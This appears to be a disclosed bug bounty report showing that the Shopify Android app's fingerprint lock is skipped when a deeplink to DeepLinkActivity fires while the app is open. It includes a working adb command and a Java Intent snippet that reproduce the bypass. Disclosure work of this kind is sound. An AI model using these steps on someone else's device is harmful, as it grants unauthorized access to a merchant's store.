Bypass of biometrics security functionality is possible in Android application (com.shopify.mobile)

# Summary Shopify Android App has an option to sign in to the app using fingerprint. But if the application was open and someone triggers a "deeplink", authentication is no longer required. ## Step to Reproduce {F523700} Link: [Shopify Help Center - Topics - Products](https://help.shopify.com/en/manual/products) NOTE¹: The application must be **open** when triggered `com.shopify.mobile.lib.app.DeepLinkActivity`. NOTE²: It is also possible via ADB and Java (Android App): `adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'` ```java Intent intent = new Intent(); intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity"); intent.setData(Uri.parse("https://www.shopify.com/admin/products")); startActivity(intent); ``` My environment information: {F523698} {F523699} ## Impact Unauthorized access to use the application.